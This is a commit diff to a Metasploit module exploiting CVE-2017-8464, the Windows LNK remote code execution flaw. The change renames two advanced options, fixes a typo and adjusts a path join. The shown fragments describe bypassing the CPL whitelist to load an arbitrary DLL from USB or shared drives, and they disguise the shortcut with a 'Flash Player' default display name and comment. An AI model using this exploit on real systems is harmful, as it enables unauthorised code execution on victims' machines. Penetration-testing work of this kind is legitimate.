Skip to content

Commit 482ce00

Browse files
zeroSteinerzeroSteiner
committed
Update the advanced option names and a typo
1 parent 949633e commit 482ce00

File tree

1 file changed

+6
-6
lines changed

1 file changed

+6
-6
lines changed

modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb

Lines changed: 6 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -26,7 +26,7 @@ def initialize(info = {})
2626
the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary
2727
DLL file.
2828
29-
If not PATH is specified, the module will use drive letters D through Z so the files
29+
If no PATH is specified, the module will use drive letters D through Z so the files
3030
may be placed in the root path of a drive such as a shared VM folder or USB drive.
3131
},
3232
'Author' =>
@@ -77,14 +77,14 @@ def initialize(info = {})
7777
register_advanced_options(
7878
[
7979
OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true]),
80-
OptString.new('LNK_COMMENT', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']),
81-
OptString.new('LNK_DISPLAY_NAME', [true, 'The display name to use in the generated LNK file', 'Flash Player'])
80+
OptString.new('LnkComment', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']),
81+
OptString.new('LnkDisplayName', [true, 'The display name to use in the generated LNK file', 'Flash Player'])
8282
]
8383
)
8484
end
8585

8686
def exploit
87-
path = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464')
87+
path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-8464')
8888
arch = target['Arch'] == ARCH_ANY ? payload.arch.first : target['Arch']
8989
datastore['EXE::Path'] = path
9090
datastore['EXE::Template'] = ::File.join(path, "template_#{arch}_windows.dll")
@@ -117,8 +117,8 @@ def exploit
117117
def generate_link(path)
118118
vprint_status("Generating LNK file to load: #{path}")
119119
path << "\x00"
120-
display_name = datastore['LNK_DISPLAY_NAME'].dup << "\x00" # LNK Display Name
121-
comment = datastore['LNK_COMMENT'].dup << "\x00"
120+
display_name = datastore['LnkDisplayName'].dup << "\x00" # LNK Display Name
121+
comment = datastore['LnkComment'].dup << "\x00"
122122

123123
# Control Panel Applet ItemID with our DLL
124124
cpl_applet = [

0 commit comments

Comments
 (0)